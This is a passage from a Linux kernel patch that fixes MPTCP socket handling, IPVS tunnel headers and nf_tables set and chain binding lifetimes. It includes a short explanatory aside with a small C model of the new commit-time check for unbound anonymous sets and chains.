+-		return 0;
++		return -EBUSY;
+ 
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+@@ -3118,6 +3121,7 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 		inet_sk(nsk)->pinet6 = mptcp_inet6_sk(nsk);
+ #endif
+ 
++	nsk->sk_wait_pending = 0;
+ 	__mptcp_init_sock(nsk);
+ 
+ 	msk = mptcp_sk(nsk);
+@@ -3320,9 +3324,14 @@ static void mptcp_release_cb(struct sock *sk)
+ 	for (;;) {
+ 		unsigned long flags = (msk->cb_flags & MPTCP_FLAGS_PROCESS_CTX_NEED) |
+ 				      msk->push_pending;
++		struct list_head join_list;
++
+ 		if (!flags)
+ 			break;
+ 
++		INIT_LIST_HEAD(&join_list);
++		list_splice_init(&msk->join_list, &join_list);
++
+ 		/* the following actions acquire the subflow socket lock
+ 		 *
+ 		 * 1) can't be invoked in atomic scope
+@@ -3333,8 +3342,9 @@ static void mptcp_release_cb(struct sock *sk)
+ 		msk->push_pending = 0;
+ 		msk->cb_flags &= ~flags;
+ 		spin_unlock_bh(&sk->sk_lock.slock);
++
+ 		if (flags & BIT(MPTCP_FLUSH_JOIN_LIST))
+-			__mptcp_flush_join_list(sk);
++			__mptcp_flush_join_list(sk, &join_list);
+ 		if (flags & BIT(MPTCP_PUSH_PENDING))
+ 			__mptcp_push_pending(sk, 0);
+ 		if (flags & BIT(MPTCP_RETRANSMIT))
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 336878f8a222a..047e46dd028dd 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1688,14 +1688,16 @@ static void subflow_state_change(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 	struct sock *parent = subflow->conn;
++	struct mptcp_sock *msk;
+ 
+ 	__subflow_state_change(sk);
+ 
++	msk = mptcp_sk(parent);
+ 	if (subflow_simultaneous_connect(sk)) {
+ 		mptcp_propagate_sndbuf(parent, sk);
+ 		mptcp_do_fallback(sk);
+-		mptcp_rcv_space_init(mptcp_sk(parent), sk);
+-		pr_fallback(mptcp_sk(parent));
++		mptcp_rcv_space_init(msk, sk);
++		pr_fallback(msk);
+ 		subflow->conn_finished = 1;
+ 		mptcp_set_connected(parent);
+ 	}
+@@ -1711,11 +1713,12 @@ static void subflow_state_change(struct sock *sk)
+ 
+ 	subflow_sched_work_if_closed(mptcp_sk(parent), sk);
+ 
+-	if (__mptcp_check_fallback(mptcp_sk(parent)) &&
+-	    !subflow->rx_eof && subflow_is_done(sk)) {
+-		subflow->rx_eof = 1;
+-		mptcp_subflow_eof(parent);
+-	}
++	/* when the fallback subflow closes the rx side, trigger a 'dummy'
++	 * ingress data fin, so that the msk state will follow along
++	 */
++	if (__mptcp_check_fallback(msk) && subflow_is_done(sk) && msk->first == sk &&
++	    mptcp_update_rcv_data_fin(msk, READ_ONCE(msk->ack_seq), true))
++		mptcp_schedule_work(parent);
+ }
+ 
+ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+diff --git a/net/netfilter/ipvs/ip_vs_xmit.c b/net/netfilter/ipvs/ip_vs_xmit.c
+index 0291713798842..7243079ef3546 100644
+--- a/net/netfilter/ipvs/ip_vs_xmit.c
++++ b/net/netfilter/ipvs/ip_vs_xmit.c
+@@ -1225,6 +1225,7 @@ ip_vs_tunnel_xmit(struct sk_buff *skb, struct ip_vs_conn *cp,
+ 	skb->transport_header = skb->network_header;
+ 
+ 	skb_set_inner_ipproto(skb, next_protocol);
++	skb_set_inner_mac_header(skb, skb_inner_network_offset(skb));
+ 
+ 	if (tun_type == IP_VS_CONN_F_TUNNEL_TYPE_GUE) {
+ 		bool check = false;
+@@ -1373,6 +1374,7 @@ ip_vs_tunnel_xmit_v6(struct sk_buff *skb, struct ip_vs_conn *cp,
+ 	skb->transport_header = skb->network_header;
+ 
+ 	skb_set_inner_ipproto(skb, next_protocol);
++	skb_set_inner_mac_header(skb, skb_inner_network_offset(skb));
+ 
+ 	if (tun_type == IP_VS_CONN_F_TUNNEL_TYPE_GUE) {
+ 		bool check = false;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 13d4913266b4d..7f71bdbc82672 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -153,6 +153,7 @@ static struct nft_trans *nft_trans_alloc_gfp(const struct nft_ctx *ctx,
+ 		return NULL;
+ 
+ 	INIT_LIST_HEAD(&trans->list);
++	INIT_LIST_HEAD(&trans->binding_list);
+ 	trans->msg_type = msg_type;
+ 	trans->ctx	= *ctx;
+ 
+@@ -165,13 +166,20 @@ static struct nft_trans *nft_trans_alloc(const struct nft_ctx *ctx,
+ 	return nft_trans_alloc_gfp(ctx, msg_type, size, GFP_KERNEL);
+ }
+ 
+-static void nft_trans_destroy(struct nft_trans *trans)
++static void nft_trans_list_del(struct nft_trans *trans)
+ {
+ 	list_del(&trans->list);
++	list_del(&trans->binding_list);
++}
++
++static void nft_trans_destroy(struct nft_trans *trans)
++{
++	nft_trans_list_del(trans);
+ 	kfree(trans);
+ }
+ 
+-static void nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set)
++static void __nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set,
++				 bool bind)
+ {
+ 	struct nftables_pernet *nft_net;
+ 	struct net *net = ctx->net;
+@@ -185,16 +193,80 @@ static void nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set)
+ 		switch (trans->msg_type) {
+ 		case NFT_MSG_NEWSET:
+ 			if (nft_trans_set(trans) == set)
+-				nft_trans_set_bound(trans) = true;
++				nft_trans_set_bound(trans) = bind;
+ 			break;
+ 		case NFT_MSG_NEWSETELEM:
+ 			if (nft_trans_elem_set(trans) == set)
+-				nft_trans_elem_set_bound(trans) = true;
++				nft_trans_elem_set_bound(trans) = bind;
++			break;
++		}
++	}
++}
++
++static void nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	return __nft_set_trans_bind(ctx, set, true);
++}
++
++static void nft_set_trans_unbind(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	return __nft_set_trans_bind(ctx, set, false);
++}
++
++static void __nft_chain_trans_bind(const struct nft_ctx *ctx,
++				   struct nft_chain *chain, bool bind)
++{
++	struct nftables_pernet *nft_net;
++	struct net *net = ctx->net;
++	struct nft_trans *trans;
++
++	if (!nft_chain_binding(chain))
++		return;
++
++	nft_net = nft_pernet(net);
++	list_for_each_entry_reverse(trans, &nft_net->commit_list, list) {
++		switch (trans->msg_type) {
++		case NFT_MSG_NEWCHAIN:
++			if (nft_trans_chain(trans) == chain)
++				nft_trans_chain_bound(trans) = bind;
++			break;
++		case NFT_MSG_NEWRULE:
++			if (trans->ctx.chain == chain)
++				nft_trans_rule_bound(trans) = bind;
+ 			break;
+ 		}
+ 	}
+ }
+ 
++static void nft_chain_trans_bind(const struct nft_ctx *ctx,
++				 struct nft_chain *chain)
++{
++	__nft_chain_trans_bind(ctx, chain, true);
++}
++
++int nf_tables_bind_chain(const struct nft_ctx *ctx, struct nft_chain *chain)
++{
++	if (!nft_chain_binding(chain))
++		return 0;
++
++	if (nft_chain_binding(ctx->chain))
++		return -EOPNOTSUPP;
++
++	if (chain->bound)
++		return -EBUSY;
++
++	chain->bound = true;
++	chain->use++;
++	nft_chain_trans_bind(ctx, chain);
++
++	return 0;
++}
++
++void nf_tables_unbind_chain(const struct nft_ctx *ctx, struct nft_chain *chain)
++{
++	__nft_chain_trans_bind(ctx, chain, false);
++}
++
+ static int nft_netdev_register_hooks(struct net *net,
+ 				     struct list_head *hook_list)
+ {
+@@ -294,6 +366,19 @@ static void nft_trans_commit_list_add_tail(struct net *net, struct nft_trans *tr
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 
++	switch (trans->msg_type) {
++	case NFT_MSG_NEWSET:
++		if (!nft_trans_set_update(trans) &&
++		    nft_set_is_anonymous(nft_trans_set(trans)))
++			list_add_tail(&trans->binding_list, &nft_net->binding_list);
++		break;
++	case NFT_MSG_NEWCHAIN:
++		if (!nft_trans_chain_update(trans) &&
++		    nft_chain_binding(nft_trans_chain(trans)))
++			list_add_tail(&trans->binding_list, &nft_net->binding_list);
++		break;
++	}
++
+ 	list_add_tail(&trans->list, &nft_net->commit_list);
+ }
+ 
+@@ -340,8 +425,9 @@ static struct nft_trans *nft_trans_chain_add(struct nft_ctx *ctx, int msg_type)
+ 				ntohl(nla_get_be32(ctx->nla[NFTA_CHAIN_ID]));
+ 		}
+ 	}
+-
++	nft_trans_chain(trans) = ctx->chain;
+ 	nft_trans_commit_list_add_tail(ctx->net, trans);
++
+ 	return trans;
+ }
+ 
+@@ -359,8 +445,7 @@ static int nft_delchain(struct nft_ctx *ctx)
+ 	return 0;
+ }
+ 
+-static void nft_rule_expr_activate(const struct nft_ctx *ctx,
+-				   struct nft_rule *rule)
++void nft_rule_expr_activate(const struct nft_ctx *ctx, struct nft_rule *rule)
+ {
+ 	struct nft_expr *expr;
+ 
+@@ -373,9 +458,8 @@ static void nft_rule_expr_activate(const struct nft_ctx *ctx,
+ 	}
+ }
+ 
+-static void nft_rule_expr_deactivate(const struct nft_ctx *ctx,
+-				     struct nft_rule *rule,
+-				     enum nft_trans_phase phase)
++void nft_rule_expr_deactivate(const struct nft_ctx *ctx, struct nft_rule *rule,
++			      enum nft_trans_phase phase)
+ {
+ 	struct nft_expr *expr;
+ 
+@@ -497,6 +581,58 @@ static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+ 	return __nft_trans_set_add(ctx, msg_type, set, NULL);
+ }
+ 
++static void nft_setelem_data_deactivate(const struct net *net,
++					const struct nft_set *set,
++					struct nft_set_elem *elem);
++
++static int nft_mapelem_deactivate(const struct nft_ctx *ctx,
++				  struct nft_set *set,
++				  const struct nft_set_iter *iter,
++				  struct nft_set_elem *elem)
++{
++	nft_setelem_data_deactivate(ctx->net, set, elem);
++
++	return 0;
++}
++
++struct nft_set_elem_catchall {
++	struct list_head	list;
++	struct rcu_head		rcu;
++	void			*elem;
++};
++
++static void nft_map_catchall_deactivate(const struct nft_ctx *ctx,
++					struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++
++	list_for_each_entry(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		nft_setelem_data_deactivate(ctx->net, set, &elem);
++		break;
++	}
++}
++
++static void nft_map_deactivate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	struct nft_set_iter iter = {
++		.genmask	= nft_genmask_next(ctx->net),
++		.fn		= nft_mapelem_deactivate,
++	};
++
++	set->ops->walk(ctx, set, &iter);
++	WARN_ON_ONCE(iter.err);
++
++	nft_map_catchall_deactivate(ctx, set);
++}
++
+ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	int err;
+@@ -505,6 +641,9 @@ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ 	if (err < 0)
+ 		return err;
+ 
++	if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++		nft_map_deactivate(ctx, set);
++
+ 	nft_deactivate_next(ctx->net, set);
+ 	ctx->table->use--;
+ 
+@@ -2188,7 +2327,7 @@ static int nft_basechain_init(struct nft_base_chain *basechain, u8 family,
+ 	return 0;
+ }
+ 
+-static int nft_chain_add(struct nft_table *table, struct nft_chain *chain)
++int nft_chain_add(struct nft_table *table, struct nft_chain *chain)
+ {
+ 	int err;
+ 
+@@ -3315,8 +3454,7 @@ err_fill_rule_info:
+ 	return err;
+ }
+ 
+-static void nf_tables_rule_destroy(const struct nft_ctx *ctx,
+-				   struct nft_rule *rule)
++void nf_tables_rule_destroy(const struct nft_ctx *ctx, struct nft_rule *rule)
+ {
+ 	struct nft_expr *expr, *next;
+ 
+@@ -3333,7 +3471,7 @@ static void nf_tables_rule_destroy(const struct nft_ctx *ctx,
+ 	kfree(rule);
+ }
+ 
+-void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *rule)
++static void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *rule)
+ {
+ 	nft_rule_expr_deactivate(ctx, rule, NFT_TRANS_RELEASE);
+ 	nf_tables_rule_destroy(ctx, rule);
+@@ -3421,12 +3559,6 @@ int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
+ 	return 0;
+ }
+ 
+-struct nft_set_elem_catchall {
+-	struct list_head	list;
+-	struct rcu_head		rcu;
+-	void			*elem;
+-};
+-
+ int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	u8 genmask = nft_genmask_next(ctx->net);
+@@ -3669,7 +3801,7 @@ err_destroy_flow_rule:
+ 	if (flow)
+ 		nft_flow_rule_destroy(flow);
+ err_release_rule:
+-	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE);
++	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE_ERROR);
+ 	nf_tables_rule_destroy(&ctx, rule);
+ err_release_expr:
+ 	for (i = 0; i < n; i++) {
+@@ -4642,6 +4774,9 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
+ 			return -EOPNOTSUPP;
+ 
++		if (nft_set_is_anonymous(set))
++			return -EOPNOTSUPP;
++
+ 		err = nft_set_expr_alloc(&ctx, set, nla, exprs, &num_exprs, flags);
+ 		if (err < 0)
+ 			return err;
+@@ -4745,7 +4880,7 @@ err_set_expr_alloc:
+ 	for (i = 0; i < set->num_exprs; i++)
+ 		nft_expr_destroy(&ctx, set->exprs[i]);
+ err_set_destroy:
+-	ops->destroy(set);
++	ops->destroy(&ctx, set);
+ err_set_init:
+ 	kfree(set->name);
+ err_set_name:
+@@ -4760,7 +4895,7 @@ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 
+ 	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+ 		list_del_rcu(&catchall->list);
+-		nft_set_elem_destroy(set, catchall->elem, true);
++		nf_tables_set_elem_destroy(ctx, set, catchall->elem);
+ 		kfree_rcu(catchall, rcu);
+ 	}
+ }
+@@ -4775,7 +4910,7 @@ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+ 	for (i = 0; i < set->num_exprs; i++)
+ 		nft_expr_destroy(ctx, set->exprs[i]);
+ 
+-	set->ops->destroy(set);
++	set->ops->destroy(ctx, set);
+ 	nft_set_catchall_destroy(ctx, set);
+ 	kfree(set->name);
+ 	kvfree(set);
+@@ -4936,10 +5071,60 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++static void nft_setelem_data_activate(const struct net *net,
++				      const struct nft_set *set,
++				      struct nft_set_elem *elem);
++
++static int nft_mapelem_activate(const struct nft_ctx *ctx,
++				struct nft_set *set,
++				const struct nft_set_iter *iter,
++				struct nft_set_elem *elem)
++{
++	nft_setelem_data_activate(ctx->net, set, elem);
++
++	return 0;
++}
++
++static void nft_map_catchall_activate(const struct nft_ctx *ctx,
++				      struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++
++	list_for_each_entry(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		nft_setelem_data_activate(ctx->net, set, &elem);
++		break;
++	}
++}
++
++static void nft_map_activate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	struct nft_set_iter iter = {
++		.genmask	= nft_genmask_next(ctx->net),
++		.fn		= nft_mapelem_activate,
++	};
++
++	set->ops->walk(ctx, set, &iter);
++	WARN_ON_ONCE(iter.err);
++
++	nft_map_catchall_activate(ctx, set);
++}
++
+ void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+-	if (nft_set_is_anonymous(set))
++	if (nft_set_is_anonymous(set)) {
++		if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++			nft_map_activate(ctx, set);
++
+ 		nft_clear(ctx->net, set);
++	}
+ 
+ 	set->use++;
+ }
+@@ -4950,14 +5135,28 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+-	case NFT_TRANS_PREPARE:
++	case NFT_TRANS_PREPARE_ERROR:
++		nft_set_trans_unbind(ctx, set);
+ 		if (nft_set_is_anonymous(set))
+ 			nft_deactivate_next(ctx->net, set);
+ 
++		set->use--;
++		break;
++	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set)) {
++			if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++				nft_map_deactivate(ctx, set);
++
++			nft_deactivate_next(ctx->net, set);
++		}
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
++		if (nft_set_is_anonymous(set) &&
++		    set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++			nft_map_deactivate(ctx, set);
++
+ 		set->use--;
+ 		fallthrough;
+ 	default:
+@@ -5710,6 +5909,7 @@ static void nft_set_elem_expr_destroy(const struct nft_ctx *ctx,
+ 		__nft_set_elem_expr_destroy(ctx, expr);
+ }
+ 
++/* Drop references and destroy. Called from gc, dynset and abort path. */
+ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ 			  bool destroy_expr)
+ {
+@@ -5731,11 +5931,11 @@ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ }
+ EXPORT_SYMBOL_GPL(nft_set_elem_destroy);
+ 
+-/* Only called from commit path, nft_setelem_data_deactivate() already deals
+- * with the refcounting from the preparation phase.
++/* Destroy element. References have already been dropped in the preparation
++ * path via nft_setelem_data_deactivate().
+  */
+-static void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
+-				       const struct nft_set *set, void *elem)
++void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
++				const struct nft_set *set, void *elem)
+ {
+ 	struct nft_set_ext *ext = nft_set_elem_ext(set, elem);
+ 
+@@ -6368,7 +6568,7 @@ err_elem_free:
+ 	if (obj)
+ 		obj->use--;
+ err_elem_userdata:
+-	nf_tables_set_elem_destroy(ctx, set, elem.priv);
++	nft_set_elem_destroy(set, elem.priv, true);
+ err_parse_data:
+ 	if (nla[NFTA_SET_ELEM_DATA] != NULL)
+ 		nft_data_release(&elem.data.val, desc.type);
+@@ -6413,7 +6613,8 @@ static int nf_tables_newsetelem(struct sk_buff *skb,
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+ 
+-	if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
++	if (!list_empty(&set->bindings) &&
++	    (set->flags & (NFT_SET_CONSTANT | NFT_SET_ANONYMOUS)))
+ 		return -EBUSY;
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -6446,7 +6647,6 @@ static int nf_tables_newsetelem(struct sk_buff *skb,
+ void nft_data_hold(const struct nft_data *data, enum nft_data_types type)
+ {
+ 	struct nft_chain *chain;
+-	struct nft_rule *rule;
+ 
+ 	if (type == NFT_DATA_VERDICT) {
+ 		switch (data->verdict.code) {
+@@ -6454,15 +6654,6 @@ void nft_data_hold(const struct nft_data *data, enum nft_data_types type)
+ 		case NFT_GOTO:
+ 			chain = data->verdict.chain;
+ 			chain->use++;
+-
+-			if (!nft_chain_is_bound(chain))
+-				break;
+-
+-			chain->table->use++;
+-			list_for_each_entry(rule, &chain->rules, list)
+-				chain->use++;
+-
+-			nft_chain_add(chain->table, chain);
+ 			break;
+ 		}
+ 	}
+@@ -6697,7 +6888,9 @@ static int nf_tables_delsetelem(struct sk_buff *skb,
+ 	set = nft_set_lookup(table, nla[NFTA_SET_ELEM_LIST_SET], genmask);
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+-	if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
++
++	if (!list_empty(&set->bindings) &&
++	    (set->flags & (NFT_SET_CONSTANT | NFT_SET_ANONYMOUS)))
+ 		return -EBUSY;
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -7464,6 +7657,7 @@ void nf_tables_deactivate_flowtable(const struct nft_ctx *ctx,
+ 				    enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
++	case NFT_TRANS_PREPARE_ERROR:
+ 	case NFT_TRANS_PREPARE:
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
+@@ -8658,7 +8852,7 @@ static void nf_tables_trans_destroy_work(struct work_struct *w)
+ 	synchronize_rcu();
+ 
+ 	list_for_each_entry_safe(trans, next, &head, list) {
+-		list_del(&trans->list);
++		nft_trans_list_del(trans);
+ 		nft_commit_release(trans);
+ 	}
+ }
+@@ -9025,6 +9219,27 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 		return 0;
+ 	}
+ 
++	list_for_each_entry(trans, &nft_net->binding_list, binding_list) {
++		switch (trans->msg_type) {
++		case NFT_MSG_NEWSET:
++			if (!nft_trans_set_update(trans) &&
++			    nft_set_is_anonymous(nft_trans_set(trans)) &&
++			    !nft_trans_set_bound(trans)) {
++				pr_warn_once("nftables ruleset with unbound set\n");
++				return -EINVAL;
++			}
++			break;
++		case NFT_MSG_NEWCHAIN:
++			if (!nft_trans_chain_update(trans) &&
++			    nft_chain_binding(nft_trans_chain(trans)) &&
++			    !nft_trans_chain_bound(trans)) {
++				pr_warn_once("nftables ruleset with unbound chain\n");
++				return -EINVAL;
++			}
++			break;
++		}
++	}
++
+ 	/* 0. Validate ruleset, otherwise roll back for error reporting. */
+ 	if (nf_tables_validate(net) < 0)
+ 		return -EAGAIN;
+@@ -9368,7 +9583,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				kfree(nft_trans_chain_name(trans));
+ 				nft_trans_destroy(trans);
+ 			} else {
+-				if (nft_chain_is_bound(trans->ctx.chain)) {
++				if (nft_trans_chain_bound(trans)) {
+ 					nft_trans_destroy(trans);
+ 					break;
+ 				}
+@@ -9385,6 +9600,10 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWRULE:
++			if (nft_trans_rule_bound(trans)) {
++				nft_trans_destroy(trans);
++				break;
++			}
+ 			trans->ctx.chain->use--;
+ 			list_del_rcu(&nft_trans_rule(trans)->list);
+ 			nft_rule_expr_deactivate(&trans->ctx,
+@@ -9417,6 +9636,9 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 		case NFT_MSG_DELSET:
+ 			trans->ctx.table->use++;
+ 			nft_clear(trans->ctx.net, nft_trans_set(trans));
++			if (nft_trans_set(trans)->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++				nft_map_activate(&trans->ctx, nft_trans_set(trans));
++
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWSETELEM:
+@@ -9494,7 +9716,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 
+ 	list_for_each_entry_safe_reverse(trans, next,
+ 					 &nft_net->commit_list, list) {
+-		list_del(&trans->list);
++		nft_trans_list_del(trans);
+ 		nf_tables_abort_release(trans);
+ 	}
+ 
+@@ -9943,22 +10165,12 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ static void nft_verdict_uninit(const struct nft_data *data)
+ {
+ 	struct nft_chain *chain;
+-	struct nft_rule *rule;
+ 
+ 	switch (data->verdict.code) {
+ 	case NFT_JUMP:
+ 	case NFT_GOTO:
+ 		chain = data->verdict.chain;
+ 		chain->use--;
+-
+-		if (!nft_chain_is_bound(chain))
+-			break;
+-
+-		chain->table->use--;
+-		list_for_each_entry(rule, &chain->rules, list)
+-			chain->use--;
+-
+-		nft_chain_del(chain);
+ 		break;
+ 	}
+ }
+@@ -10193,6 +10405,9 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	list_for_each_entry_safe(set, ns, &table->sets, list) {
+ 		list_del(&set->list);
+ 		table->use--;
++		if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++			nft_map_deactivate(&ctx, set);
++
+ 		nft_set_destroy(&ctx, set);
+ 	}
+ 	list_for_each_entry_safe(obj, ne, &table->objects, list) {
+@@ -10277,6 +10492,7 @@ static int __net_init nf_tables_init_net(struct net *net)
+ 
+ 	INIT_LIST_HEAD(&nft_net->tables);
+ 	INIT_LIST_HEAD(&nft_net->commit_list);
++	INIT_LIST_HEAD(&nft_net->binding_list);
+ 	INIT_LIST_HEAD(&nft_net->module_list);
+ 	INIT_LIST_HEAD(&nft_net->notify_list);
+ 	mutex_init(&nft_net->commit_mutex);
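
The new binding_list gives the commit path a cheap way to reject a ruleset that created an anonymous set or a binding-flagged chain without ever binding it to a rule. A compact model of that commit-time validation, with transaction records reduced to the fields that matter (names simplified):

    #include <stdbool.h>
    #include <stdio.h>

    enum msg { NEWSET, NEWCHAIN };

    struct trans {
            enum msg type;
            bool anonymous; /* anonymous set / binding-flagged chain */
            bool bound;     /* set when a rule binds the object      */
    };

    /* Mirror of the new commit-time loop over nft_net->binding_list:
     * every anonymous/binding object must have been bound by now.
     */
    static int validate_bindings(const struct trans *t, int n)
    {
            int i;

            for (i = 0; i < n; i++) {
                    if (t[i].anonymous && !t[i].bound) {
                            fprintf(stderr, "unbound %s in transaction\n",
                                    t[i].type == NEWSET ? "set" : "chain");
                            return -22; /* -EINVAL */
                    }
            }
            return 0;
    }

    int main(void)
    {
            struct trans batch[] = {
                    { NEWSET,   true, true  }, /* anonymous set, bound: ok   */
                    { NEWCHAIN, true, false }, /* binding chain, unbound: no */
            };

            printf("commit: %d\n", validate_bindings(batch, 2));
            return 0;
    }
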
+diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
+index ee6840bd59337..8f1bfa6ccc2d9 100644
+--- a/net/netfilter/nfnetlink_osf.c
++++ b/net/netfilter/nfnetlink_osf.c
+@@ -439,3 +439,4 @@ module_init(nfnl_osf_init);
+ module_exit(nfnl_osf_fini);
+ 
+ MODULE_LICENSE("GPL");
++MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_OSF);
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 5f28b21abc7df..900e75e8c3465 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -76,11 +76,9 @@ static int nft_immediate_init(const struct nft_ctx *ctx,
+ 		switch (priv->data.verdict.code) {
+ 		case NFT_JUMP:
+ 		case NFT_GOTO:
+-			if (nft_chain_is_bound(chain)) {
+-				err = -EBUSY;
+-				goto err1;
+-			}
+-			chain->bound = true;
++			err = nf_tables_bind_chain(ctx, chain);
++			if (err < 0)
++				return err;
+ 			break;
+ 		default:
+ 			break;
+@@ -98,6 +96,31 @@ static void nft_immediate_activate(const struct nft_ctx *ctx,
+ 				   const struct nft_expr *expr)
+ {
+ 	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
++	const struct nft_data *data = &priv->data;
++	struct nft_ctx chain_ctx;
++	struct nft_chain *chain;
++	struct nft_rule *rule;
++
++	if (priv->dreg == NFT_REG_VERDICT) {
++		switch (data->verdict.code) {
++		case NFT_JUMP:
++		case NFT_GOTO:
++			chain = data->verdict.chain;
++			if (!nft_chain_binding(chain))
++				break;
++
++			chain_ctx = *ctx;
++			chain_ctx.chain = chain;
++
++			list_for_each_entry(rule, &chain->rules, list)
++				nft_rule_expr_activate(&chain_ctx, rule);
++
++			nft_clear(ctx->net, chain);
++			break;
++		default:
++			break;
++		}
++	}
+ 
+ 	return nft_data_hold(&priv->data, nft_dreg_to_type(priv->dreg));
+ }
+@@ -107,6 +130,43 @@ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 				     enum nft_trans_phase phase)
+ {
+ 	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
++	const struct nft_data *data = &priv->data;
++	struct nft_ctx chain_ctx;
++	struct nft_chain *chain;
++	struct nft_rule *rule;
++
++	if (priv->dreg == NFT_REG_VERDICT) {
++		switch (data->verdict.code) {
++		case NFT_JUMP:
++		case NFT_GOTO:
++			chain = data->verdict.chain;
++			if (!nft_chain_binding(chain))
++				break;
++
++			chain_ctx = *ctx;
++			chain_ctx.chain = chain;
++
++			list_for_each_entry(rule, &chain->rules, list)
++				nft_rule_expr_deactivate(&chain_ctx, rule, phase);
++
++			switch (phase) {
++			case NFT_TRANS_PREPARE_ERROR:
++				nf_tables_unbind_chain(ctx, chain);
++				fallthrough;
++			case NFT_TRANS_PREPARE:
++				nft_deactivate_next(ctx->net, chain);
++				break;
++			default:
++				nft_chain_del(chain);
++				chain->bound = false;
++				chain->table->use--;
++				break;
++			}
++			break;
++		default:
++			break;
++		}
++	}
+ 
+ 	if (phase == NFT_TRANS_COMMIT)
+ 		return;
+@@ -131,15 +191,27 @@ static void nft_immediate_destroy(const struct nft_ctx *ctx,
+ 	case NFT_GOTO:
+ 		chain = data->verdict.chain;
+ 
+-		if (!nft_chain_is_bound(chain))
